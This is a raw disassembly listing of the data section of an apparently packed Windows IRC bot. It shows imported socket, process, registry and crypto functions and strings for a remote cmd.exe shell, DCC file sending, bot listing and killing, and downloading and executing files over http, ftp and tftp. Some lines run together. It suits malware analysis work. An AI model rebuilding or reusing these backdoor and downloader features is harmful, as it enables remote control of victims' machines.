dword_4170B0 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4170B4 dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_4170B8 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4170BC dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4170C0 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4170C4 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4170C8 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_408F2E+134�r
dword_4170CC dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; sub_408F2E+7F�r ...
dword_4170D0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_4092A4:loc_409307�r ...
dword_4170D4 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_4092A4+14�r ...
dword_4170D8 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4092A4+A�r ...
dword_4170DC dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_4170E0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_4098F3+1B6�r
dword_4170E4 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_4170E8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_406643+19�r
dword_4170EC dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_4170F0 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_4170F4 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorModedword_4170F8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4170FC dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_414EF4+5BC�r ...
dword_417100 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_417104 dd 7C814AF2h ; resolved to->KERNEL32.GetEnvironmentVariableAdword_417108 dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_414EF4+5CE�r ...
dword_41710C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection dd 0
dword_417114 dd 77C1C1F3h ; resolved to->MSVCRT._itoadword_417118 dd 77C464BFh ; resolved to->MSVCRT._strnicmpdword_41711C dd 77C226F6h ; resolved to->MSVCRT._CxxThrowExceptiondword_417120 dd 77C21868h dword_417124 dd 77C227FAh ; resolved to->MSVCRT.__CxxFrameHandlerdword_417128 dd 77C472B0h ; resolved to->MSVCRT.memmovedword_41712C dd 77C46030h ; resolved to->MSVCRT.strcpydword_417130 dd 77C35E02h ; resolved to->MSVCRT._rotrdword_417134 dd 77C35DDEh ; resolved to->MSVCRT._rotldword_417138 dd 77C3FF8Ah ; resolved to->MSVCRT._vsnprintfdword_41713C dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_417140 dd 77C1C9C9h ; resolved to->MSVCRT.tolowerdword_417144 dd 77C47730h ; resolved to->MSVCRT.strcmpdword_417148 dd 77C4186Ah ; resolved to->MSVCRT.printfdword_41714C dd 77C29CC5h dword_417150 dd 77C29CDDh dword_417154 dd 77C3FE49h ; resolved to->MSVCRT.vsprintfdword_417158 dd 77C3A3DBh ; resolved to->MSVCRT._beginthreadexdword_41715C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_417160 dd 77C50290h ; resolved to->MSVCRT.ceildword_417164 dd 77C4FA10h ; resolved to->MSVCRT._ftoldword_417168 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_41716C dd 77C2C437h ; resolved to->MSVCRT.reallocdword_417170 dd 77C47A50h ; resolved to->MSVCRT.strncmpdword_417174 dd 77C3FA76h ; resolved to->MSVCRT._snprintfdword_417178 dd 77C47C60h ; resolved to->MSVCRT.strstrdword_41717C dd 77C41B72h ; resolved to->MSVCRT.sscanfdword_417180 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_417184 dd 77C4139Ch ; resolved to->MSVCRT.fseekdword_417188 dd 77C411FBh ; resolved to->MSVCRT.freaddword_41718C dd 77C3F010h ; resolved to->MSVCRT.fopendword_417190 dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_417194 dd 77C4173Bh ; resolved to->MSVCRT.fwritedword_417198 dd 77C41574h ; resolved to->MSVCRT.ftelldword_41719C dd 77C46040h ; resolved to->MSVCRT.strcatdword_4171A0 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_4171A4 dd 77C4A969h ; resolved to->MSVCRT.clockdword_4171A8 dd 77C3F931h ; resolved to->MSVCRT.sprintfdword_4171AC dd 77C47A90h ; resolved to->MSVCRT.strncpydword_4171B0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_4171B4 dd 77C2C21Bh ; resolved to->MSVCRT.freedword_4171B8 dd 77C2C407h ; resolved to->MSVCRT.mallocdword_4171BC dd 77C478A0h ; resolved to->MSVCRT.strlendword_4171C0 dd 77C4624Eh ; resolved to->MSVCRT._stricmp align 8
dword_4171C8 dd 7712A63Fh align 10h
dword_4171D0 dd 7CA41110h ; resolved to->SHELL32.ShellExecuteA ; sub_402A32+79B�r ...
align 8
dword_4171D8 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_4171DC dd 7E44F209h ; resolved to->USER32.IsCharAlphaNumericAdword_4171E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_408F2E+1D1�r ...
dword_4171E4 dd 7E43212Bh ; resolved to->USER32.GetWindowTextA ; sub_415B60+84�r
dword_4171E8 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_4171EC dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_40D74D+7E�r
dd 0
dword_4171F4 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_4050EA+106�r ...
dword_4171F8 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4171FC dd 71AC1028h ; resolved to->WS2_32.accept ; sub_4048EF+39F�r
dword_417200 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_412A3A+178�r ...
dword_417204 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_4055E5+7B�r ...
dword_417208 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_411DC5+DF�r ...
dword_41720C dd 71AB428Ah ; resolved to->WS2_32.send ; sub_40A9CF+1A74�r
dword_417210 dd 71AC0B50h ; resolved to->WS2_32.getpeername ; sub_4045B2+21�r
dword_417214 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_40447B+10�r
dword_417218 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_4046BC+CE�r ...
dword_41721C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_40732D+1A8�r ...
dword_417220 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_4038BA+171�r ...
dword_417224 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_4038BA+186�r ...
dword_417228 dd 71ABE59Dh ; resolved to->WS2_32.getservbyportdword_41722C dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_404E1C+E0�r ...
dword_417230 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_40A9CF+1A80�r ...
dword_417234 dd 71AB2A5Eh ; resolved to->WS2_32.WSASetLastError ; sub_403588+4A�r ...
dword_417238 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_403588+1FE�r ...
dword_41723C dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_4055E5+F3�r ...
dword_417240 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_40449C+21�r ...
dword_417244 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4055E5+DD�r ...
dword_417248 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_4053DC+27�r ...
dword_41724C dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_4020C2+201�r
dword_417250 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_411DC5+372�r ...
dword_417254 dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_407148+183�r ...
dword_417258 dd 71AB2D0Fh ; resolved to->WS2_32.recvfromdword_41725C dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_417260 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_417264 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_417268 dd 71AB88D3h ; resolved to->WS2_32.listen align 10h
flt_417270 dd 1.0e3 ; DATA XREF: sub_401E38+207�r
; sub_401E38+22F�r ...
flt_417274 dd 1.024e3 ; DATA XREF: sub_408B30+2A2�r
dword_417278 dd 0FFFFFFFFh, 409449h, 40945Fh, 0dword_417288 dd 0FFFFFFFFh, 409572h, 40958Ah, 0dword_417298 dd 0FFFFFFFFh, 416AE7h, 416AFDh, 0 dd offset loc_416AC5
dd offset loc_416ADB
dd offset dword_4172F0
off_4172B4 dd offset sub_416F05 ; DATA XREF: sub_416ED3+12�o
; .packed:00416F3A�o ...
dd offset dword_417338
off_4172BC dd offset sub_416F86 ; DATA XREF: .packed:off_41DE70�o
; .packed:off_41DE90�o
off_4172C0 dd offset off_41DE70 ; DATA XREF: .packed:004172D8�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_4172C0
dword_4172DC dd 3 dup(0) dd 1, 4172D8h
dword_4172F0 dd 3 dup(0) dd offset off_41DE70
dd offset dword_4172DC+4
dd 0
off_417308 dd offset off_41DE90 ; DATA XREF: .packed:00417320�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_417308
dd 0
db 0 ; DATA XREF: .packed:00417348�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 417320h
dword_417338 dd 3 dup(0) dd offset off_41DE90
dd offset unk_417328
align 10h
dword_417350 dd 19930520h, 4, 417370h, 5 dup(0) dd 0FFFFFFFFh, 416FB0h, 0
dd offset loc_416FBC
dd 1, 416FC5h, 2, 416FD1h, 0
dd offset off_41DE70
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 416F21h, 0
dword_4173B0 dd 1, 417390h dword_4173B8 dd 0 dd offset sub_416F4E
dd 0
dd offset dword_4173B0
dd 1757Ch, 2 dup(0)
dd 17876h, 17114h, 1765Ch, 2 dup(0)
dd 1788Eh, 171F4h, 17498h, 2 dup(0)
dd 17C70h, 17030h, 17640h, 2 dup(0)
dd 17CE6h, 171D8h, 17468h, 2 dup(0)
dd 17DBAh, 17000h, 17638h, 2 dup(0)
dd 17DD8h, 171D0h, 17630h, 2 dup(0)
dd 17E3Eh, 171C8h, 5 dup(0)
dd 77DECF4Ah, 77DDEDE5h, 77DD761Bh, 77DD7883h, 77DDEBE7h
dd 77DDEAF4h, 77DFD4C9h, 77DE8546h, 77DE5244h, 77DE7F96h
dd 77DD6BF0h, 0
dd 7C812ADEh, 7C80D262h, 7C8360DDh, 7C80BDB6h, 7C821363h
dd 7C801A24h, 7C831C45h, 7C831CB8h, 7C814EEAh, 7C801D77h
dd 7C80ADA0h, 7C81CDDAh, 7C8286EEh, 7C910331h, 7C810D87h
dd 7C8217EAh, 7C81E0C7h, 7C80DDF5h, 7C8216A4h, 7C802367h
dd 7C85F90Fh, 7C81AE17h, 7C80180Eh, 7C80B6A1h, 7C80B4CFh
dd 7C8309E1h, 7C8021CCh, 7C802442h, 7C801E16h, 7C809B47h
dd 7C812782h, 7C831EABh, 7C80992Fh, 7C810637h, 7C80B974h
dd 7C80B905h, 7C80945Ch, 7C8310F2h, 7C83039Bh, 7C8214E3h
dd 7C80929Ch, 7C82FA46h, 7C80A427h, 7C80BCCFh, 7C81CE03h
dd 7C809EF1h, 7C809920h, 7C901005h, 7C80DDFEh, 7C80AC0Fh
dd 7C80E93Fh, 7C80BE01h, 7C810111h, 7C814AF2h, 7C830D74h
dd 7C9010EDh, 0
dd 77C1C1F3h, 77C464BFh, 77C226F6h, 77C21868h, 77C227FAh
dd 77C472B0h, 77C46030h, 77C35E02h, 77C35DDEh, 77C3FF8Ah
dd 77C46EB0h, 77C1C9C9h, 77C47730h, 77C4186Ah, 77C29CC5h
dd 77C29CDDh, 77C3FE49h, 77C3A3DBh, 77C35C94h, 77C50290h
dd 77C4FA10h, 77C39E7Eh, 77C2C437h, 77C47A50h, 77C3FA76h
dd 77C47C60h, 77C41B72h, 77C1BF18h, 77C4139Ch, 77C411FBh
dd 77C3F010h, 77C40AB1h, 77C4173Bh, 77C41574h, 77C46040h
dd 77C475F0h, 77C4A969h, 77C3F931h, 77C47A90h, 77C46F70h
dd 77C2C21Bh, 77C2C407h, 77C478A0h, 77C4624Eh, 0
dd 7712A63Fh, 0
dd 7CA41110h, 0
dd 7E41BE4Bh, 7E44F209h, 7E41A8ADh, 7E43212Bh, 7E42DE87h
dd 7E42F383h, 0
dd 71AB406Ah, 71AB4544h, 71AC1028h, 71AC0BDEh, 71AB3EA1h
dd 71AB3E00h, 71AB428Ah, 71AC0B50h, 71AB4519h, 71AB3B91h
dd 71AB3F41h, 71ABE479h, 71AB94DCh, 71ABE59Dh, 71AB2DC0h
dd 71AB9639h, 71AB2A5Eh, 71AB2B66h, 71AB4FD4h, 71AB951Eh
dd 71AB2BF4h, 71AB615Ah, 71AB2BC0h, 71AB2C69h, 71AB4428h
dd 71AB2D0Fh, 71AB4489h, 71AB50C8h, 71AB664Dh, 71AB88D3h
dd 0
dd 747302BAh, 79706372h, 2BE0000h, 6C727473h, 6E65h, 616D0291h
dd 636F6C6Ch, 25E0000h, 65657266h, 2970000h, 636D656Dh
dd 7970h, 747302C1h, 70636E72h, 2B20079h, 69727073h, 66746Eh
dd 6C630243h, 6B636Fh, 656D0299h, 7465736Dh, 2B60000h
dd 63727473h, 7461h, 74660264h, 6C6C65h, 77660266h, 65746972h
dd 24C0000h, 6F6C6366h, 6573h, 6F660257h, 6E6570h, 7266025Dh
dd 646165h, 73660262h, 6B6565h, 7461023Dh, 696Fh, 737302B5h
dd 666E6163h, 2C50000h, 73727473h, 7274h, 735F01AEh, 6972706Eh
dd 66746Eh, 747302C0h, 6D636E72h, 2A70070h, 6C616572h
dd 636F6Ch, 78650249h, 7469h, 665F00F1h, 6C6F74h, 65630241h
dd 6C69h, 655F00CAh, 70656378h, 61685F74h, 656C646Eh, 3372h
dd 625F00A6h, 6E696765h, 65726874h, 78656461h, 2DC0000h
dd 72707376h, 66746E69h, 100000h, 40333F3Fh, 50584159h
dd 5A405841h, 0F0000h, 40323F3Fh, 41504159h, 5A404958h
dd 29E0000h, 6E697270h, 6674h, 747302B8h, 706D6372h, 2D30000h
dd 6F6C6F74h, 726577h, 656D0296h, 706D636Dh, 1E10000h
dd 6E73765Fh, 6E697270h, 6674h, 725F019Bh, 6C746Fh, 725F019Ch
dd 72746Fh, 656D0298h, 766F6D6Dh, 490065h
a__cxxframehand db '__CxxFrameHandler',0
aMsvcrt_dll db 'MSVCRT.dll',0
align 2
db '(',0
aWsaioctl db 'WSAIoctl',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
db '|',0
aDeletefilea db 'DeleteFileA',0
db 0Eh
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
a_ db '.',0
aClosehandle db 'CloseHandle',0
db 51h ; Q
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 10h
db 49h ; I
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0AEh ; ®
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
dd 704F027Ch, 72506E65h, 7365636Fh, 1750073h
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 10h
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 2ABh
aReadfile db 'ReadFile',0
align 2
dw 152h
aGetexitcodepro db 'GetExitCodeProcess',0
align 4
db 87h ; ‡
db 2, 50h, 65h
aEknamedpipe db 'ekNamedPipe',0
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 2
aM db 'Œ',0
aDuplicatehandl db 'DuplicateHandle',0
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcess',0
a__0 db '_',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2D0h
aSearchpatha db 'SearchPathA',0
db 97h ; —
db 3, 57h, 72h
aItefile db 'iteFile',0
db 69h ; i
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
db '=',0
aCopyfilea db 'CopyFileA',0
aP db '¯',0
aExitprocess db 'ExitProcess',0
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
db 48h ; H
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 314h
aSetfiletime db 'SetFileTime',0
db 5Dh ; ]
db 1, 47h, 65h
aTfiletime db 'tFileTime',0
aM_0 db 'M',0
aCreatefilea db 'CreateFileA',0
db 0E9h ; é
db 1, 47h, 65h
aTwindowsdirect db 'tWindowsDirectoryA',0
align 10h
db 0BFh ; ¿
db 3, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
db 0FFh
db 2, 53h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
align 4
dd 6547016Ch, 636F4C74h, 49656C61h, 416F666Eh, 1DF0000h
dd 56746547h, 69737265h, 78456E6Fh, 10C0041h, 43746547h
dd 75706D6Fh, 4E726574h, 41656D61h, 1FA0000h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db 46h ; F
db 1, 47h, 65h
aTdiskfreespace db 'tDiskFreeSpaceExA',0
dw 14Bh
aGetdrivetypea db 'GetDriveTypeA',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 29Ah
aQueryperforman db 'QueryPerformanceFrequency',0
dw 299h
aQueryperform_0 db 'QueryPerformanceCounter',0
dd 73490226h, 43646142h, 5065646Fh, 7274h, 65540352h, 6E696D72h
dd 54657461h, 61657268h, 2190064h
aInitializecr_0 db 'InitializeCriticalSection',0
aP_0 db '',0
aEntercriticals db 'EnterCriticalSection',0
align 2
dw 247h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
aI db 'i',0
aCreatethread db 'CreateThread',0
align 2
dw 365h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 5Eh ; ^
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aN db 'N',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 3B3h
aLstrcmpa db 'lstrcmpA',0
align 2
dw 150h
aGetenvironment db 'GetEnvironmentVariableA',0
db 0BCh ; ¼
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0B9h ; ¹
db 3, 6Ch, 73h
aTrcpya db 'trcpyA',0
align 10h
aZ db 'Z',0
aCreatemutexa db 'CreateMutexA',0
align 10h
db 0Ah
db 3, 53h, 65h
aTerrormode db 'tErrorMode',0
align 10h
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
dw 2D5h
aWsprintfa db 'wsprintfA',0
dw 177h
aGetwindowtexta db 'GetWindowTextA',0
align 4
db 17h
db 1, 47h, 65h
aTforegroundwin db 'tForegroundWindow',0
aU_0 db 'ã',0
aFindwindowa db 'FindWindowA',0
db 3Ah ; :
db 2, 53h, 65h
aNdmessagea db 'ndMessageA',0
align 10h
db 97h ; —
db 1, 49h, 73h
aCharalphanumer db 'CharAlphaNumericA',0
aUser32_dll db 'USER32.dll',0
align 2
dw 1C9h
aRegclosekey db 'RegCloseKey',0
dd 655201D2h, 6C654467h, 56657465h, 65756C61h, 1D90041h
dd 45676552h, 566D756Eh, 65756C61h, 1E20041h, 4F676552h
dd 4B6E6570h, 78457965h, 1EC0041h, 51676552h, 79726575h
dd 756C6156h, 41784565h, 1F90000h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 655201CDh, 65724367h, 4B657461h, 78457965h
dd 1230041h, 55746547h, 4E726573h, 41656D61h, 0A00000h
aCryptreleaseco db 'CryptReleaseContext',0
aC db '–',0
aCryptgenrandom db 'CryptGenRandom',0
align 2
aE db '…',0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
aAdvapi32_dll db 'ADVAPI32.dll',0
align 4
db 7
db 1, 53h, 68h
aEllexecutea db 'ellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
db 0BDh ; ½
db 1, 5Fh, 73h
aTrcmpi db 'trcmpi',0
align 10h
db 34h ; 4
db 1, 5Fh, 69h
db 74h ; t
db 6Fh, 61h, 0
db 0C5h ; Å
db 1, 5Fh, 73h
aTrnicmp db 'trnicmp',0
aA_0 db 'A',0
a_cxxthrowexcep db '_CxxThrowException',0
align 2
dw 0Eh
a??1type_info@@ db '??1type_info@@UAE@XZ',0
align 2
dw 252h
aLocalfree db 'LocalFree',0
aOleaut32_dll db 'OLEAUT32.dll',0
align 4
dd 6Dh dup(0)
off_418000 dd offset dword_418098 ; DATA XREF: sub_401000+1D�r
; sub_401000+2E�r
dd offset dword_41805C
dd offset dword_418040
dd offset dword_418014
dd 0
dword_418014 dd 0FFE1ACA1h, 0D1A6A79Bh, 0F287B0BEh, 0FAECF5B0h, 0C4C0819Ch
; DATA XREF: .packed:0041800C�o
dd 0E69FB9B2h, 0F99A8197h, 0F9C0F3AAh, 0CAC1B9AEh, 2 dup(0)
dword_418040 dd 0DFD49AA1h, 0F7888BA9h, 0F49C8F97h, 0FADCEEACh, 0E4EE8194h
; DATA XREF: .packed:00418008�o
dd 0AF92h, 0
dword_41805C dd 0DFD49AA1h, 0F7888BA9h, 0F49C8F97h, 0FADCEEACh, 0FCEE8194h
; DATA XREF: .packed:00418004�o
dd 0FD9E84B7h, 0D4A9B1BCh, 0F0DDF3ABh, 0CEE4819Ch, 0FD9399ACh
dd 0E2A79EA5h, 0E7CAD2B0h, 0CED19C84h, 0ADh, 0
dword_418098 dd 0DFD49AA1h, 0F7888BA9h, 0F49C8F97h, 0FADCEEACh, 0FCEE8194h
; DATA XREF: .packed:off_418000�o
dd 0FD9E84B7h, 0D4A9B1BCh, 0F0DDF3ABh, 0CEE4819Ch, 0FD9399ACh
dd 0E2A79EA5h, 0B0h, 0
dword_4180CC dd 2343003h, 2037525h, 746F6220h, 20297328h, 6E756F66h
; DATA XREF: sub_401244+52D�o
dd 69772064h, 73206874h, 6E697274h, 30032067h, 73250234h
dd 2E0203h
dword_4180F8 dd 62206F4Eh, 2073746Fh, 6E756F66h, 69772064h, 73206874h
; DATA XREF: sub_401244+50A�o
dd 6E697274h, 30032067h, 73250234h, 2E0203h
dword_41811C dd 6E756F66h, 74732064h, 676E6972h, 34300320h, 3732502h
; DATA XREF: sub_401244+412�o
dd 6E692002h, 20732520h, 34300328h, 3692502h, 2902h
dword_418144 dd 3430032Dh, 3752502h, 4C202D02h, 69747369h, 6220676Eh
; DATA XREF: sub_401244+45�o
dd 2073746Fh, 68746977h, 72747320h, 20676E69h, 2343003h
dd 2037325h, 3Ah
dword_418174 dd 62207325h, 2073746Fh, 68746977h, 72747320h, 20676E69h
; DATA XREF: sub_4017AA+93�o
dd 2343003h, 2037325h, 0
aKilling db 'Killing',0 ; DATA XREF: sub_4017AA:loc_401830�o
aListing db 'Listing',0 ; DATA XREF: sub_4017AA+7D�o
dword_4181A4 dd 303h aCmd_exeProcess db 'Cmd.exe process has terminated.',0 ; DATA XREF: sub_401981+2C9�o
aCouldNotReadDa db 'Could not read data from process.',0 ; DATA XREF: sub_401981+27E�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_401981+48�o
aErrorWhileExec db 'Error while executing command.',0 ; DATA XREF: sub_401D6E+B9�o
align 4
asc_418214 db 0Dh,0Ah,0 ; DATA XREF: sub_401D6E:loc_401E0B�o
; sub_403DF3+18C�o ...
align 4
aRemoteCmdThrea db 'Remote cmd thread',0 ; DATA XREF: sub_401D6E+7E�o
align 4
aOpen db 'open',0 ; DATA XREF: sub_401D6E+26�o
; sub_402A32+794�o ...
align 4
dword_418234 dd 65636552h, 64657669h, 34300320h, 3732502h, 72662002h
; DATA XREF: sub_401E38+248�o
dd 3206D6Fh, 25023430h, 20020373h, 3206E69h, 25023430h
dd 66322E30h, 65730203h, 69772063h, 3206874h, 25023430h
dd 66332E30h, 424B0203h, 6365732Fh, 0
dword_418280 dd 3430032Dh, 3752502h, 52202D02h, 69656365h, 676E6976h
; DATA XREF: sub_401E38+CC�o
dd 34300320h, 3732502h, 72662002h, 3206D6Fh, 25023430h
dd 20373h
dword_4182AC dd 6277h ; sub_402698:loc_40288E�o ...
dword_4182B0 dd 746E6553h, 34300320h, 3732502h, 6F742002h, 34300320h
; DATA XREF: sub_4020C2+3E1�o
dd 3732502h, 6E692002h, 34300320h, 2E302502h, 2036632h
dd 20636573h, 68746977h, 34300320h, 2E302502h, 2036633h
dd 732F424Bh, 6365h
dword_4182F4 dd 6E617254h, 72656673h, 20666F20h, 2343003h, 2037325h
; DATA XREF: sub_4020C2+313�o
dd 206F7420h, 2343003h, 2037325h, 6E616320h, 6C6C6563h
dd 6465h
dword_418320 dd 3430032Dh, 3752502h, 53202D02h, 69646E65h, 320676Eh
; DATA XREF: sub_4020C2+28E�o
dd 25023430h, 20020373h, 3206F74h, 25023430h, 20373h
dword_418348 dd 43434401h, 4E455320h, 25222044h, 25202273h, 73252064h
; DATA XREF: sub_4020C2+20F�o
dd 1642520h, 0
aDccSendSS db 'DCC Send %s (%s)',0 ; DATA XREF: sub_4020C2+1D2�o
align 4
aRb db 'rb',0 ; DATA XREF: sub_4020C2:loc_40220F�o
; sub_406AE7+63�o ...
align 4
dword_41837C dd 65636552h, 6E697669h, 30032067h, 73250234h, 66200203h
; DATA XREF: sub_4024F3+101�o
dd 206D6F72h, 2343003h, 2037325h, 0
dword_4183A0 dd 646E6553h, 20676E69h, 2343003h, 2037325h, 206F7420h
; DATA XREF: sub_40260D+72�o
dd 2343003h, 2037325h, 0
aContentLengthU db 'Content-Length: %u',0Dh,0Ah,0 ; DATA XREF: sub_402698+155�o
align 4
aContentLength db 'Content-Length: ',0 ; DATA XREF: sub_402698+104�o
align 4
asc_4183EC db 0Dh,0Ah ; DATA XREF: sub_402698:loc_402758�o
db 0Dh,0Ah,0
align 4
aGetSHttp1_0Hos db 'GET /%s HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_402698+3A�o
; sub_4088FC+E9�o
db 'Host: %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
dword_418414 dd 3430032Dh, 3752502h, 45202D02h, 726F7272h, 69687720h
; DATA XREF: sub_402A32+7F6�o
dd 6420656Ch, 6C6E776Fh, 6964616Fh, 320676Eh, 25023430h
dd 2E020373h, 0
dword_418444 dd 3430032Dh, 3752502h, 55202D02h, 6C62616Eh, 6F742065h
; DATA XREF: sub_402A32+7D1�o
dd 61747320h, 3207472h, 25023430h, 2E020373h, 0
dword_41846C dd 3430032Dh, 3752502h, 53202D02h, 65636375h, 75667373h
; DATA XREF: sub_402A32+738�o
dd 20796C6Ch, 6E776F64h, 64616F6Ch, 3206465h, 25023430h
dd 20020373h, 68746977h, 34300320h, 2E302502h, 2036632h
dd 732F424Bh, 73256365h, 2Eh
dword_4184B4 dd 7865202Ch, 74756365h, 676E69hdword_4184C0 dd 7075202Ch, 69746164h, 676Ehunk_4184CC db 2Dh ; - ; DATA XREF: sub_402A32+50E�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aNoFileToDownlo db '- No file to download specified.',0
align 4
asc_4184F8: ; DATA XREF: sub_402A32:loc_402F16�o
unicode 0, </>,0
asc_4184FC: ; DATA XREF: sub_402A32+45F�o
; sub_414EF4+644�o ...
unicode 0, <:>,0
unk_418500 db 2Dh ; - ; DATA XREF: sub_402A32+3E4�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aUnsupportedPro db '- Unsupported protocol specified.',0
align 4
a69 db '69',0 ; DATA XREF: sub_402A32+3A8�o
align 10h
aTftp db 'tftp://',0 ; DATA XREF: sub_402A32+387�o
aAnonymous db 'anonymous',0 ; DATA XREF: sub_402A32+35A�o
; sub_402A32+36D�o
align 4
a21 db '21',0 ; DATA XREF: sub_402A32+328�o
align 4
aFtp db 'ftp://',0 ; DATA XREF: sub_402A32+307�o
align 10h
a80 db '80',0 ; DATA XREF: sub_402A32+2CE�o
; sub_4043E9+27�o ...
align 4
aHttp db 'http://',0 ; DATA XREF: sub_402A32+2AD�o
dword_41855C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 65722074h
; DATA XREF: sub_402A32+135�o
dd 73206461h, 6372756Fh, 69662065h, 320656Ch, 25023430h
dd 2E020373h, 0
dword_41858C dd 3430032Dh, 3752502h, 43202D02h, 6F6E6E61h, 72772074h
; DATA XREF: sub_402A32+110�o
dd 20657469h, 64206F74h, 69747365h, 6974616Eh, 66206E6Fh
dd 20656C69h, 2343003h, 2037325h, 2Eh
dword_4185C4 dd 656C6966h, 2F2F3Ahdword_4185CC dd 3430032Dh, 3752502h, 44202D02h, 6C6E776Fh, 6964616Fh
; DATA XREF: sub_402A32+AA�o
dd 320676Eh, 25023430h, 20020373h, 3206F74h, 25023430h
dd 2E020373h, 0
dword_4185FC dd 6E776F44h, 64616F6Ch, 20676E69h, 2343003h, 2037325h
; DATA XREF: sub_403260+B2�o
dd 206F7420h, 2343003h, 2037325h, 0
dword_418620 dd 6578652Eh, 0 ; sub_412720+51�o
aQuitRestarting db 'QUIT :restarting',0 ; DATA XREF: sub_40332B:loc_403538�o
; sub_40332B:loc_403545�o ...
align 4
